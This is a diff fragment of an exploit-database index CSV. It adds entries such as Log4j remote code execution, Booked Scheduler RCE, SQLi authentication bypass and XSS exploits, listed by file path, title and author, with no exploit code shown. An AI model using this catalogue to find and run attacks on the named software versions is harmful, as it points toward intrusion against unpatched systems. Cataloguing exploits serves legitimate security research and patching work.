 50576,exploits/linux/remote/50576.py,"Raspberry Pi 5.10 - Default Credentials",1970-01-01,netspooky,remote,linux,
 50588,exploits/linux/remote/50588.txt,"HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
+50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java,
+50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44674,3 +44678,8 @@ id,file,description,date,author,type,platform,port
 50586,exploits/php/webapps/50586.txt,"Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,fuzzyap1,webapps,php,
 50587,exploits/php/webapps/50587.txt,"Free School Management Software 1.0 - Remote Code Execution (RCE)",1970-01-01,fuzzyap1,webapps,php,
 50589,exploits/php/webapps/50589.py,"WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",webapps,php,
+50593,exploits/php/webapps/50593.txt,"WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Mansi Singh",webapps,php,
+50594,exploits/php/webapps/50594.py,"Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,0sunday,webapps,php,
+50595,exploits/hardware/webapps/50595.txt,"Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
+50596,exploits/php/webapps/50596.txt,"meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,LiquidWorm,webapps,php,
+50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",1970-01-01,"Yehia Elghaly",webapps,php,